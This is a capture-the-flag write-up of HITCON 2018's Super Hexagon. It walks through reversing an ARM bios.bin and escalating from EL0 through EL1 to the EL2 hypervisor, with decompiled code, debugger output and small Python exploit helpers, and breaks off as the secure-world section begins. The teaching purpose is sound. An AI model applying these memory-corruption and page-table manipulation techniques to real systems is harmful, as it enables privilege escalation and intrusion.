There and Back Again: HITCON 2018’s Super Hexagon

One of the most interesting and unique CTF challenges I’ve seen over the past year was the “Super Hexagon” challenge from HITCON 2018. The challenge is unlike any other in several ways. A single bios.bin is distributed to the player that contains six (!) different levels to pwn, spread across all current exception levels, and involving both armv7 and aarch64 execution.

Each level requires the full gamut of exploitation skills: reversing, attack surface analysis, bug hunting, exploitation, and stable execution. Furthermore, challenges involving ARM Secure World attacks have been scarce in CTFs, despite the prevalence of TrustZone in devices all around us. During the CTF itself, only one team (Dragon Sector) solved all 6 levels, and only 2 teams reached level 4. Since I missed working on the challenge during the CTF, I decided to revisit it here ahead of the upcoming HITCON 2019 CTF to solve and discuss all 6 levels of the challenge. Let’s begin!

A Brief Overview

[Figure: challenge layout]

Super Hexagon
Escape each level for your six flags.

EL0 - Hard
EL1 - Harder
EL2 - Hardest
S-EL0 - Hardester
S-EL1 - Hardestest
S-EL3 - Hardestestest

The challenge authors distributed a single tar.gz archive consisting of a Docker setup, a qemu-system-aarch64 binary, and a bios.bin. We also receive two QEMU patches. One of them adds support for a new ARM machine “hitcon”, and the other patches QEMU to allow debugging ARM and thumb modes inside qemu-system-aarch64 - more on that later. The first qemu.patch also contains some useful physical memory layout information, which will inform our efforts later.

static const MemMapEntry memmap[] = {
    /* Space up to 0x8000000 is reserved for a boot ROM */
    [VIRT_FLASH] =              {          0, 0x08000000 },
    [VIRT_CPUPERIPHS] =         { 0x08000000, 0x00020000 },
    [VIRT_UART] =               { 0x09000000, 0x00001000 },
    [VIRT_SECURE_MEM] =         { 0x0e000000, 0x01000000 },
    [VIRT_MEM] =                { 0x40000000, RAMLIMIT_BYTES },
};
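
To make the table easier to consult while reversing, here is a minimal Python sketch that classifies a physical address by region. The `MEMMAP` dictionary and `region_for` helper are names invented for this illustration. Since the value of RAMLIMIT_BYTES is not shown in the patch excerpt, the sketch simply assumes VIRT_MEM is open-ended.

```python
# Physical memory regions copied from the memmap[] table in qemu.patch.
# The VIRT_MEM size (RAMLIMIT_BYTES) is not given in the excerpt, so it is
# left as None and treated as open-ended here (an assumption).
MEMMAP = {
    "VIRT_FLASH":      (0x00000000, 0x08000000),
    "VIRT_CPUPERIPHS": (0x08000000, 0x00020000),
    "VIRT_UART":       (0x09000000, 0x00001000),
    "VIRT_SECURE_MEM": (0x0E000000, 0x01000000),
    "VIRT_MEM":        (0x40000000, None),
}


def region_for(paddr):
    """Return the name of the region containing paddr, or None."""
    for name, (base, size) in MEMMAP.items():
        if size is None:
            if paddr >= base:
                return name
        elif base <= paddr < base + size:
            return name
    return None


if __name__ == "__main__":
    for addr in (0x0, 0x09000000, 0x0E400000, 0x40100000):
        print(hex(addr), region_for(addr))
```

For instance, an address such as 0x0E400000 falls in VIRT_SECURE_MEM, while 0x40100000 falls in VIRT_MEM.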

The challenge is distributed with a Dockerfile, but to avoid dealing with Docker we can create the required path on our own system (/home/super_hexagon/) and copy the binaries and flag folders there. When we run it, we’re presented with the following boot log:

NOTICE:  UART console initialized
INFO:    MMU: Mapping 0 - 0x2844 (783)
INFO:    MMU: Mapping 0xe000000 - 0xe204000 (40000000000703)
INFO:    MMU: Mapping 0x9000000 - 0x9001000 (40000000000703)
NOTICE:  MMU enabled
NOTICE:  BL1: HIT-BOOT v1.0
INFO:    BL1: RAM 0xe000000 - 0xe204000
INFO:      SCTLR_EL3: 30c5083b
INFO:      SCR_EL3:   00000738
INFO:    Entry point address = 0x40100000
INFO:    SPSR = 0x3c9
VERBOSE: Argument #0 = 0x0
VERBOSE: Argument #1 = 0x0
VERBOSE: Argument #2 = 0x0
VERBOSE: Argument #3 = 0x0
NOTICE:  UART console initialized
[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000
[KERNEL] mmu enabled
INFO:      TEE PC: e400000
INFO:      TEE SPSR: 1d3
NOTICE:  TEE OS initialized
[KERNEL] Starting user program ...

=== Trusted Keystore ===

Command:
    0 - Load key
    1 - Save key

cmd>

From the log alone we can already derive some useful information, including virtual address ranges and translation table entries. A “TEE OS” is mentioned, which is likely resident in S-EL1. We also see the entrypoint for our input, which is a menu containing some key operations. Playing with these doesn’t yield anything interesting yet, however.

=== Trusted Keystore ===

Command:
    0 - Load key
    1 - Save key

cmd> 1
index: 0
key: hello      
[0] <= hello
cmd> 0
index: 0
[0] => 0e00
cmd> 
index: 
[0] => 0e00
cmd> 

Initial Reversing

Opening the binary in IDA and disassembling the entrypoint yields instructions that look sufficiently like the start of EL3.

0x0004   MOVK  X0, #0x30C5,LSL#16 ; Set bits M, C, I
0x0008   MSR   6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x000C   ISB
0x0010   ADR   X0, el3_interrupt_table
0x0014   MSR   #6, c12, c0, #0, X0 ; [>] VBAR_EL3 (Vector Base Address Register (EL3))
0x0018   ISB
0x001C   MOV   X1, #0b1000000001010
0x0020   MRS   X0, #6, c1, c0, #0 ; [<] SCTLR_EL3 (System Control Register (EL3))
0x0024   ORR   X0, X0, X1
0x0028   MSR   #6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x002C   ISB
0x0030   MOV   X0, #0x238 ; Set bits EA, SIF
0x0034   MSR   #6, c1, c1, #0, X0 ; [>] SCR_EL3 (Secure Configuration Register)
0x0038   MOV   X0, #0x8000
0x003C   MOVK  X0, #1,LSL#16
0x0040   MSR   #6, c1, c3, #1, X0 ; [>] MDCR_EL3 (Monitor Debug Configuration Register (EL3))
0x0044   MSR   #7, #4  ; Clr PSTATE.DAIF [-A--]
0x0048   MOV   X0, #0
0x004C   MSR   #6, c1, c1, #2, X0 ; [>] CPTR_EL3 (Architectural Feature Trap Register (EL3))
0x0050   LDR   X0, =0xE002000
0x0054   LDR   X1, =0x202000

The binary begins by setting up several MSRs and copying code from the ROM into specific physical addresses. These will be a useful jumping off point for identifying the start of other code blobs, since the EL2/EL1/S-EL1 code is all mapped here by EL3. Tracing down further we find MMU initialization, and then a drop to a lower EL for further setup.

But where is EL0? Searching for some of the menu strings (“0 - Load key”) and scrolling around yields something interesting - bios.bin contains an ELF header at offset 0xbc010.

000bbfe0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000bbff0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000bc000: 3200 0000 0000 0000 0000 0000 0000 0000  2...............
000bc010: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............ <--
000bc020: 0200 b700 0100 0000 e800 4000 0000 0000  ..........@.....
000bc030: 4000 0000 0000 0000 c8a7 0000 0000 0000  @...............

EL0: Getting started

Extracting the data at that offset yields a valid, statically linked ELF file with debug symbols. checksec tells us there is no ASLR, but NX is enabled (we can confirm this is enforced in our debugger). The ELF looks very similar to a standard Linux userland binary, and comes baked with simple libc functions (printf/puts/read/scanf). Based on the strings and functionality, this is definitely our EL0 code. The first thing the binary does is load an opaque trustlet blob via syscall, followed by mapping some “world shared memory” buffers.

void load_trustlet(unsigned __int8 *base, int size)
{
  size_t v4;
  void *v5;
  unsigned int v6;
  TCI *v7;
  unsigned int v8;

  v4 = (size + 4095) & 0xFFFFF000;
  v5 = mmap(0LL, v4, 3, 0, 0, -1LL);
  v6 = tc_register_wsm(v5, (void *)v4);
  if ( v6 == -1 )
  {
    printf("tc_register_wsm: failed to register world shared memory\n");
    exit(0xFFFFFFFFLL);
  }
  memcpy(v5, base, size);
  if ( (unsigned int)tc_init_trustlet(v6, size) )
  {
    printf("tc_init_trustlet: failed to load trustlet\n");
    exit(0xFFFFFFFFLL);
  }
  v7 = (TCI *)mmap(0LL, 0x1000uLL, 3, 0, 0, -1LL);
  v8 = tc_register_wsm(v7, (void *)0x1000);
  if ( v8 == -1 )
  {
    printf("tc_register_wsm: failed to register world shared memory\n");
    exit(0xFFFFFFFFLL);
  }
  tci_buf = v7;
  tci_handle = v8;
}

We can surmise that the WSM buffers are likely shared mappings between normal and secure world. After setting up the trustlet code, the binary initializes a function pointer table with 2 functions, then goes into a loop calling the run() function for 10 iterations.

void run()
{
  int64_t buf_len;
  int idx;
  int cmd;

  printf("cmd> ");
  scanf("%d", &cmd);
  printf("index: ");
  scanf("%d", &idx);
  if ( cmd == 1 )
  {
    printf("key: ");
    scanf("%s", buf); // <---- [A]
    buf_len = (unsigned int)strlen(buf);
  }
  else
  {
    buf_len = 0LL;
  }
  cmdtb[cmd](buf, (unsigned int)idx, buf_len); // <---- [B]
}

This function is trivially vulnerable. At [A], scanf() uses an unbounded %s format specifier to read into buf, a buffer created with mmap earlier. At [B], we invoke a function pointer from cmdtb, but the signed index cmd is never bounds-checked. For that function call we control the data pointed to by the first argument, buf, and the lower 32 bits of the second argument, idx. Since cmdtb is also in the BSS, let’s further examine the surrounding memory layout there.

0x0412650: input           ; unsigned __int8 input[256]
0x0412750: cmdtb           ; cmd_func cmdtb[2]
0x0412760: tci_handle      ; unsigned int tci_handle
0x0412768: buf             ; unsigned __int8 *buf
0x0412770: tci_buf         ; TCI *tci_buf

The static buffer input is used directly inside the scanf() function, which invokes our good old friend gets().

int scanf(const unsigned __int8 *fmt, ...)
{
  __va_list_tag va[1];
  __va_list_tag ap[1];

  va_start(va, fmt);
  va_start(ap, fmt);
  gets(input); // <---- full control of input
  return vsscanf(input, fmt, (__va_list *)va);
}

We can write function pointers directly to the input buffer and then invoke them with a negative cmdtb offset, for control of PC. But where to go? Scanning the binary reveals an mprotect syscall, which is perfect. We can populate our shellcode into the buf pointer with scanf in an initial pass, then invoke the function again with buf_len set to 7, which mprotect receives as its prot argument (read, write, and execute). Since it’s being read in with scanf, we’ll write a simple alphanumeric stager to read in our real unrestricted payload.

ERROR:   [VMM] RWX pages are not allowed

Oops! Seems like the EL2 hypervisor prevents us from mapping RWX. Luckily, we can read in the shellcode first and then just mprotect it R-X, no problem.
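
The index arithmetic behind the PC control is worth spelling out. Below is a minimal Python sketch, using the BSS addresses listed earlier, that computes the negative cmdtb index for a pointer slot inside input and builds a line consisting of a decimal number followed by a packed pointer. The helper names and the target address 0x401B68 are hypothetical. Note also that every scanf() call refills input through gets(), so the pointer has to be carried by a line that is still in the buffer when cmdtb[cmd] is finally called.

```python
import struct

INPUT_ADDR = 0x412650   # unsigned __int8 input[256]
CMDTB_ADDR = 0x412750   # cmd_func cmdtb[2]
POINTER_SIZE = 8


def cmdtb_index(slot_addr):
    """Index i such that &cmdtb[i] == slot_addr (negative for slots in input)."""
    delta = slot_addr - CMDTB_ADDR
    if delta % POINTER_SIZE:
        raise ValueError("slot is not pointer-aligned relative to cmdtb")
    return delta // POINTER_SIZE


def build_line(number, target, slot_offset=8):
    """Decimal text for %d, space padding, then a pointer at input+slot_offset."""
    text = str(number).encode()
    if len(text) >= slot_offset:
        raise ValueError("number text would overlap the pointer slot")
    line = text.ljust(slot_offset, b" ") + struct.pack("<Q", target)
    if b"\n" in line:
        raise ValueError("gets() would stop early at the newline byte")
    return line


if __name__ == "__main__":
    print(cmdtb_index(INPUT_ADDR + 8))        # index reaching input+8
    print(build_line(4096, 0x401B68))         # 0x401B68 is a made-up target
```

With the pointer stored at input+8, the command to send is the value returned by `cmdtb_index(INPUT_ADDR + 8)`.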

EL1: Escalating Privileges

Now that we can execute arbitrary code in EL0 context, we can begin auditing EL1. For this we return to bios.bin. We’ll again examine the memcpy functions invoked by EL3 to find something that looks like EL1. The blob at 0xb0000, aarch64 code, contains strings prefixed with [KERNEL], so it’s a safe bet. Our primary concern is the syscall interface, since it’s the only interface we know of exposed to EL0. We find the syscall function handler at 0xB8BA8.

4 main syscalls are exposed to us: write, read (only 1 char at a time), mmap, and mprotect. We also have a series of secure call passthrough syscalls, which we’ll revisit later. mmap and mprotect both perform extensive checking on their arguments.

if ( syscall_nr == 0xDE ) // mmap, for example
{
  if ( addr ) // addr must be NULL (no MAP_FIXED)
  {
    prot = -1i64;
  }
  else if ( size & 0xFFF ) // size must be page aligned
  {
    prot = -1i64;
  }
  else
  {
    v12 = el1_find_contiguous_pages(size);
    if ( v12 == -1 )
    {
      prot = -1i64;
    }
    else
    {
      v21 = el1_allocate_el0_page(size);
      for ( j = v12; arg1 + v12 > j; j += 4096i64 )
        el1_change_el0_page_permissions(j, j + v21 - v12, prot);
      prot = v12;
    }
  }
}

write also looks relatively straightforward:

else if ( syscall_nr == 0x40 )
{
  for ( i = 0i64; i < len; ++i )
    el1_output_char(buffer[i]);
}

That leaves us with only read, which helps us out with a very useful bug.

if ( syscall_nr == 0x3F ) // read
{
    if ( arg2 )
    {
      ch = el1_read_char();
      if ( ch & 0x80000000 )
      {
        arg2 = -1i64;
      }
      else
      {
        *(_BYTE *)outp = ch; // <---- [A]
        arg2 = 1i64;
      }
    }
}

After reading in the character via el1_read_char(), it will write it back to the specified memory address. The kernel is not enforcing PAN hardware protections, so it can write directly to the specified userspace address. Astute readers will notice there’s no null check, or check to see if the address is mapped in userspace, meaning we can pass in any kernel address and write directly to it. This used to be a pretty common bug class but still pops up every now and then, most recently seen in FreeBSD for example.
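
Because read hands us exactly one byte per call, a multi-byte kernel write becomes a sequence of single-byte writes. Here is a small Python sketch of how an exploit script might plan them. The function names are invented for this illustration, and the actual delivery (one read syscall per pair, with the byte fed over the UART) is left out.

```python
def byte_writes(addr, value, width=8):
    """Split a little-endian value into (address, byte) pairs, one per read call."""
    data = value.to_bytes(width, "little")
    return [(addr + i, b) for i, b in enumerate(data)]


def diff_writes(addr, old, new, width=8):
    """Only the (address, byte) pairs that differ between old and new."""
    old_bytes = old.to_bytes(width, "little")
    return [
        (a, b)
        for (a, b), o in zip(byte_writes(addr, new, width), old_bytes)
        if b != o
    ]


if __name__ == "__main__":
    # Hypothetical example: change one byte of a 64-bit value in kernel memory.
    for a, b in diff_writes(0xFFFFFFFFC0000000, 0x1122334455667788, 0x11223344556677FF):
        print(hex(a), hex(b))
```

Writing only the bytes that change keeps the number of syscalls down, which matters when a single corrupted byte is all that is needed.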

The kernel has no ASLR to speak of, but the hypervisor is still enforcing NX. Writing to the stack could be a possibility; smashing our saved frame pointer could allow us to pivot a higher level call and achieve PC control, at which point we can ret2usr and run shellcode off an existing mapping.

I took a different approach however, since I didn’t think of that at the time. Instead, I decided to directly target EL1 translation table entries (TTEs) to replace a kernel page physaddr with that of my shellcode.

[Figure: TTE diagram]

Tracing through EL1 boot code, we find el1_setup_user_mappings(), which invokes el1_change_el0_page_permissions() to update TTE values whenever any page will be mapped. This occurs both when EL1 maps itself, as well as when EL1 loads the userspace ELF.

void el1_change_page_permissions(uint64_t virtaddr, uint64_t physaddr, char prot)
{
  uint64_t vaddr; // x22
  int64_t v4; // x19
  int64_t v5; // x20
  int64_t v6; // x21
  int64_t v7; // x0

  vaddr = virtaddr;
  if ( 0x400DC000 > physaddr || (v4 = physaddr, 0x400EB000 <= physaddr) )
  {
    el1_kprintf_0((__int64)"[KERNEL] Try to map illegal PA (user)\n");
    el1_wfi_spinloop();
  }
  if ( prot & 2 )
  {
    v5 = 0x4C3i64;
    v6 = 0x20000000000443i64;
  }
  else
  {
    v5 = 0x443i64;
    v6 = 0x200000000004C3i64;
  }
  if ( !(prot & 4) )
  {
    v6 |= 0x40000000000000ui64;
    v5 |= 0x40000000000000ui64;
  }
  v7 = el1_virt_to_phys(*(_QWORD *)((char *)&unk_C8BD7 + 0x15B9));
  el1_update_page_table(0i64, v7, vaddr, v6 | v4);
  el1_hypervisor_call(1i64, v4, v5, 0i64); // invoke vmm_mmap
  __asm { SYS   #0, c8, c7, #0 }
}

Notice that each translation table operation made also invokes a call to vmm_mmap in EL2 to validate the operation; this is the point at which our earlier attempt to map RWX triggered an abort(). The actual operation itself happens just before that hypercall, in el1_update_page_table.

// translationtable is a qword array
translationtable[(virtaddr >> 12) & 0x1FF] = physaddr_with_flags;

We can examine these TTEs in a debugger to get an idea of their values, and the function above also maps prot values cleanly to the expected flags.

gef>  x/i $pc
=> 0xffffffffc000875c:  str     x3, [x1, x2, lsl #3]

// the base of our translation table
gef>  x/4xg $x1
0xffffffffc0023000:     0x002000000002c4c3      0x002000000002d4c3
0xffffffffc0023010:     0x002000000002e4c3      0x0000000000000000

// the virtaddr to be updated
gef>  p $x19
$15 = 0x412000

// the entry for this address, mapped RW
gef>  stepi
gef>  x/xg $x1 + ($x2 << 3)
0xffffffffc0023090:     0x006000000002f443
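
The flag selection in the decompiled function can be mirrored in a few lines of Python and checked against the debugger output. This is a sketch of my reading of the decompilation, with made-up function names; the bit 54 constant is simply the 0x40000000000000 value OR’d in when prot lacks the execute bit.

```python
NOEXEC_BIT = 0x40000000000000  # OR'd into both values when !(prot & 4)


def stage1_tte(addr, prot):
    """Value EL1 stores in its own table: the v6 flags OR'd with the address."""
    flags = 0x0020000000000443 if prot & 2 else 0x00200000000004C3
    if not prot & 4:
        flags |= NOEXEC_BIT
    return flags | addr


def stage2_attrs(prot):
    """Attribute value (v5) passed to the hypervisor via el1_hypervisor_call."""
    attrs = 0x4C3 if prot & 2 else 0x443
    if not prot & 4:
        attrs |= NOEXEC_BIT
    return attrs


def tte_slot(table_base, vaddr):
    """Address of the 8-byte table entry covering vaddr."""
    return table_base + 8 * ((vaddr >> 12) & 0x1FF)


if __name__ == "__main__":
    print(hex(tte_slot(0xFFFFFFFFC0023000, 0x412000)))
    print(hex(stage1_tte(0x2F000, 3)))  # read + write
    print(hex(stage1_tte(0x2C000, 5)))  # read + execute
```

Under this model the RW entry seen at 0xffffffffc0023090 corresponds to prot = 3, and the first entry in the table corresponds to prot = 5.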

Abusing the read bug, we can read updated values directly into the TTE. But writing still faults! As it turns out, without the el1_hypervisor_call at the end of el1_change_page_permissions, the MMU in EL2 won’t be updated to reflect the changes, and will fault on our write attempt. These memory flags in EL2 seem to be associated with the physical page address, so our writable mappings won’t work directly.

To avoid this, we can twiddle the bits on the TTE to point the existing page to our own, after we’ve already mapped it executable. Then, smashing a single byte in the saved return address on the stack should allow our syscall handler to return to our now-kernel-mapped shellcode page. The final flow of the exploit works as follows.

Copy shellcode from the exploit script onto a RW mapping made with mmap
Update the mapping to be RX
Get its physical page number (deterministic across runs)
Write to EL1’s TTE for the virtual address associated with the base of the kernel. Make it point to our physical page
Smash a byte in the return address on the syscall handler stack. Again, this address will be deterministic. Execution returns to an offset in the first page of EL1, which now points to controlled data :)

EL2: (Almost) bare (emulated) metal

Wow, kernel execution! Normally this would be great, but we’re only 2/6 of the way through. We’re now faced with targeting EL2, also known as the vmm or hypervisor. EL3 init tells us that EL2 starts at offset 0x10000, with a very small amount of code, mostly enabling MSRs and setting up UART for terminal r/w. The vmm itself is mapped beginning at physical address 0x40100000. Of note as always is the EL2 MMU setup, which gives us another clue to the boot log puzzle.

void __cdecl el2_setup_mappings()
{
  unsigned __int64 i;
  __int64 v1;
  __int64 v2;
  unsigned __int64 j;
  unsigned __int64 k;
  __int64 v5;
  __int64 v6;

  el2_memset(el2_pte, 0, 0x1000i64);
  el2_memset(vmm_translationtables, 0, 0x8000i64);
  for ( i = 0i64; i <= 0x1FFFFF; i += 0x200000i64 )
    el2_pte[(i >> 21) & 0x1FF] = (uint64_t)&vmm_translationtables[512 * ((i >> 21) & 0x1FF)] | 3;
  el2_printf("[VMM] RO_IPA: %08x-%08x\n", v5, v6);
  el2_printf("[VMM] RW_IPA: %08x-%08x\n", v1, v2);
  for ( j = 0i64; j <= 0xBFFF; j += 0x1000i64 )
    el2_mmap(j, 0x443i64);
  for ( k = 0xC000i64; k <= 0x3BFFF; k += 0x1000i64 )
    el2_mmap(k, 0x400000000004C3i64);
  _WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 0), (unsigned __int64)el2_pte); // VTTBR_EL2
  _WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 2), 0x80000027ui64); // VTCR_EL2
}

At boot, the printfs emitted were as follows

[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000

Beginning at 0x40100000, it seems that EL2 reserves 0xC000 bytes for itself and then maps 0x30000 for EL1 and EL0. Those latter entries have the PXN bits set, so the vmm won’t execute off them directly.

The only exposed interface we’ve seen is the hypercall after the TTE update, so let’s take a look at the EL2 hypercall interface.

_QWORD * el2_handle_hypercall(__int64 *args)
{
  unsigned int v2;
  signed __int64 arg0;
  _QWORD *arg1;
  __int64 arg3;

  v2 = (unsigned int)_ReadStatusReg(ARM64_SYSREG(3, 4, 5, 2, 0)) >> 26;
  arg0 = *args;
  arg1 = (_QWORD *)args[1];
  arg3 = args[3];
  if ( v2 == 0x16 )
  {
    if ( arg0 == 1 )
      arg1 = el2_mmap(arg1, args[2]);
    else
      arg0 = -1i64;
  }
  else
  {
    // ... ignore securecall passthrough for now ...
  }
  *args = arg0;
  return arg1;
}

There’s only one hypercall, which is el2_mmap. Before even opening the function, we envision that any bug must somehow allow us to map an EL2 physical address to a writable mapping in EL1. We’re aware that the two arguments passed, as seen in the EL1 call, are physical address and TTE bits.

IDA has trouble with some of the spinloop functions that don’t return, so we’ll directly examine the assembly. In the interest of space I’ve trimmed it to the relevant sections and annotated it.

0x101E0 el2_mmap              ; CODE XREF: el2_setup_mappings+A4↓p
0x101E0
0x101E0 LSR X2, X0, #0x15
0x101E4 UBFX X4, X0, #0xC, #9
0x101E8 CMP X0, #0x3B,LSL#12  ; Compare the first arg to 0x3B000
0x101EC B.EQ loc_1024C

0x101F0 STP X29, X30, [SP,#var_10]!
0x101F4 MOV X29, SP
0x101F8 MOV X3, #0xBFFF
0x101FC MOVK X3, #3,LSL#16
0x10200 CMP X0, X3            ; Make sure the first argument is <= 0x3BFFF
                              ; otherwise, print "[VMM] Invalid IPA"
0x10204 B.HI loc_10294
0x10208 MOV X3, #0xBFFF
0x1020C CMP X0, X3
0x10210 B.HI loc_10218         ; Check if the argument is > 0xBFFF
                               ; If so, skip this next instruction
0x10214 TBNZ W1, #7, loc_1026C ; Check the TTE flags for bit 7, indicating writable memory
                               ; If so, reject with error:
                               ; "[VMM] try to map writable pages in RO protected area"
                               
0x10218 loc_10218              ; CODE XREF: el2_mmap+30↑j
0x10218 AND X3, X1, #0x7FFFFFFFFFFF80
0x1021C AND X3, X3, #0xFFC00000000000FF
0x10220 CMP X3, #0x80         
0x10224 B.EQ loc_10280         ; 0x80 in the bitflags indicates RWX pages
                               ; [VMM] RWX pages are not allowed
0x10228 MOV X3, #0x40000000   
0x1022C ADD X0, X0, X3
0x10230 ORR X0, X0, X1
0x10234 ADD X2, X4, X2,LSL#9
0x10238 ADRP X1, #vmm_translationtable@PAGE
0x1023C ADD X1, X1, #vmm_translationtable@PAGEOFF
0x10240 STR X0, [X1,X2,LSL#3]  ; All is well; insert the TTE
0x10244 LDP X29, X30, [SP+0x10+var_10],#0x10
0x10248 RET

The checks here are pretty robust. We can’t request writable memory in the EL2 code pages, nor can we pass in a too-large physical address. But there’s one oversight - physical addresses are not required by el2_mmap() to be aligned to 0x1000, and in fact they are never masked off before being written to the table.

The final value inserted into the translation table is (0x40000000 + arg1) | arg2, so the unmasked bottom bits of arg1 will influence the flags of the entry, and bits set in arg2 can land in its address field. Therefore, a call like hypercall(VMM_mmap, 0x14c3, 0x100000) yields the final TTE 0x401014C3, a RW mapping of the EL2 code page 0x40101000, which is inside the RO region! Exploitation is short and sweet, requiring only a single buggy hypercall. With some quick scripting, we can copy our shellcode onto our EL1 virtual address and find it dual-mapped as an EL2 page, yielding execution in hypervisor context.
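
To convince ourselves that the malicious arguments really slip past every check, here is a small Python model of the annotated assembly. It is a sketch based on the trimmed listing only: the early branch for the 0x3B000 comparison is not shown in the listing and is therefore not modeled, and the function names are my own.

```python
RWX_MASK = 0x7FFFFFFFFFFF80 & 0xFFC00000000000FF  # the two ANDs combined


def el2_mmap(ipa, attrs):
    """Model of el2_mmap: returns (table index, TTE) or raises ValueError."""
    if ipa > 0x3BFFF:
        raise ValueError("[VMM] Invalid IPA")
    if ipa <= 0xBFFF and attrs & 0x80:
        raise ValueError("[VMM] try to map writable pages in RO protected area")
    if attrs & RWX_MASK == 0x80:
        raise ValueError("[VMM] RWX pages are not allowed")
    index = ((ipa >> 21) << 9) + ((ipa >> 12) & 0x1FF)
    tte = (ipa + 0x40000000) | attrs   # ipa is never masked to a page boundary
    return index, tte


def is_rejected(ipa, attrs):
    """True if the modeled checks refuse the request."""
    try:
        el2_mmap(ipa, attrs)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    index, tte = el2_mmap(0x14C3, 0x100000)
    print(index, hex(tte), hex(tte & 0x0000FFFFFFFFF000), bool(tte & 0x80))
```

The honest request for a writable page in the RO range is refused, while the unaligned one is accepted and produces an entry whose low bits (0x4C3) carry the writable flag.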

Securecalls, and playing Telephone

With the completion of EL2 we’ve conquered the entirety of normal world! But until this point we’ve ignored all calls to the secure world, which is where we’ll find the other 3 flags we’re still missing. As a brief description, ARM segregates execution space into normal and secure worlds, where the only communication between the two is brokered by the Secure Monitor (EL3). Secure world is intended for safeguarding personal data, like fingerprints, payment information, or passwords, and it presents an API accessible over “secure calls” made with the smc instruction. Secure world has similar exception levels to normal world, with an S-EL1 (“Trusted OS” or “TEE”) running “Trusted Apps” in the S-EL0 userspace. There’s currently no S-EL2 hypervisor equivalent, but it is coming in ARMv8.4.

smc is privileged and cannot be made directly by EL0, so in our case EL0 makes a special syscall to flag its intention to EL1.

0x0401B84 ; signed __int64 tc_register_wsm(void *a1, void *a2)
0x0401B84 EXPORT tc_register_wsm
0x0401B84 tc_register_wsm
0x0401B84 MOV             X8, #3
0x0401B88 MOVK            X8, #0xFF00,LSL#16 ; x8 becomes 0xFF000003LL
0x0401B8C SVC             0
0x0401B90 RET
0x0401B90 ; End of function tc_register_wsm
0x0401B90

EL1 contains some basic validation on the securecall arguments in our case, then invokes the smc instruction to generate a trap.

void el1_securecall_passthrough(__int64 a1, __int64 arg1, unsigned __int64 arg2)
{
  unsigned __int64 v4;
  __int64 v5;
  unsigned __int64 i;
  signed __int64 v7;

  v4 = arg2;
  if ( a1 == 0xFF000005i64 )
  {
    if ( !(arg1 & 0xFFF) )
      el1_make_smc(0x83000005i64, (unsigned int)arg1, (unsigned int)arg2, 0i64);
  }
  else if ( a1 == 0xFF000003i64 )
  {
    if ( !(arg2 & 0xFFF) && arg2 <= 0x4000 && !(arg1 & 0xFFF) ) // validate physical page
    {
      v5 = el1_get_page_physaddr(arg1); // make sure the first page is mapped
      if ( (_DWORD)v5 != -1 )
      {
        for ( i = arg1 + 4096; arg1 + v4 > i; i += 4096i64 )
        {
          v7 = el1_get_page_physaddr(i);
          if ( (_DWORD)v7 == -1 || i + v5 - arg1 != v7 ) // make sure subsequent pages are mapped
            return;
        }
        el1_make_smc(0x83000003i64, v5, v4, 0i64); // invoke smc
      }
    }
  }
  else if ( a1 == 0xFF000006i64 && !(arg1 & 0xFFF) )
  {
    el1_make_smc(0x83000006i64, arg1, 0i64, 0i64);
  }
}
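
The 0xFF000003 branch is the interesting one, since it checks that the virtual range is backed by physically contiguous pages before forwarding the first physical address. A minimal Python model of that check follows; the `page_table` dictionary (virtual page to physical page) stands in for el1_get_page_physaddr and is purely illustrative.

```python
PAGE = 0x1000


def wsm_physaddr(page_table, vaddr, size):
    """Return the physical base forwarded to smc, or None if validation fails."""
    if size & 0xFFF or size > 0x4000 or vaddr & 0xFFF:
        return None
    first = page_table.get(vaddr)          # the first page must be mapped
    if first is None:
        return None
    va = vaddr + PAGE
    while va < vaddr + size:
        pa = page_table.get(va)
        # Every later page must be mapped and physically contiguous.
        if pa is None or pa != first + (va - vaddr):
            return None
        va += PAGE
    return first


if __name__ == "__main__":
    # Hypothetical mappings: two contiguous pages, then a gap.
    table = {0x7000: 0x2C000, 0x8000: 0x2D000, 0x9000: 0x30000}
    print(wsm_physaddr(table, 0x7000, 0x2000))
    print(wsm_physaddr(table, 0x7000, 0x3000))
```

Only the first physical address and the size are passed on, which is why the contiguity requirement exists at all.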

EL2 receives the trap inside its handler, since we’re technically under virtualization, and again executes an smc after some validation.

    if ( arg0 == 0x83000003i64 )
    {
      if ( arg1 <= 0x3C000 )
        arg0 = el2_make_smcall(0x83000003i64, arg1 + 0x8000000);
      else
        arg0 = -1i64;
    }
    else
    {
      arg0 = el2_make_smcall(arg0, arg1);
    }

Finally, we reach our secure monitor code in EL3, which does the actual passover into secure world and sets up the arguments. But who finally receives the call?

S-EL0: A whole new (secure) world

Stepping through EL3’s call to S-EL1/S-EL0 in a debugger quickly yields GDB errors. Luckily, with some quick consulting of the README and included patch files, we notice that the organizers included one that changes QEMU’s debug server to return 32bit ARM registers.

-    cc->set_pc = aarch64_cpu_set_pc;
-    cc->gdb_read_register = aarch64_cpu_gdb_read_register;
-    cc->gdb_write_register = aarch64_cpu_gdb_write_register;
-    cc->gdb_num_core_regs = 34;
-    cc->gdb_core_xml_file = "aarch64-core.xml";
-    cc->gdb_arch_name = aarch64_gdb_arch_name;
+    cc->set_pc = arm_cpu_set_pc;
+    cc->gdb_read_register = arm_cpu_gdb_read_register;
+    cc->gdb_write_register = arm_cpu_gdb_write_register;
+    cc->gdb_num_core_regs = 26;
+    cc->gdb_core_xml_file = "arm-core.xml";
+    cc->gdb_arch_name = arm_gdb_arch_name;

It seems like the S-EL0 and S-EL1 implementations actually run 32-bit ARM, not aarch64! We can quickly verify this by pulling the qemu-3.0.0 source and building it with the provided patch. We now lose the ability to debug aarch64, but we can break and see ARM instructions in our secure world. To be precise, it is big-endian ARM, but executing mostly in thumb mode. At this point I chose to create a second idb for bios.bin to help with reversing, and rebased it to be appropriate for S-EL1.

Let’s begin by examining the trustlet blob passed to tc_init_trustlet() back in EL0. The code registered a blob of length 0x750, beginning with the string literal “HITCON\x00\x00”.

00000000: 4849 5443 4f4e 0000 6b12 0000 0010 0000  HITCON..k.......
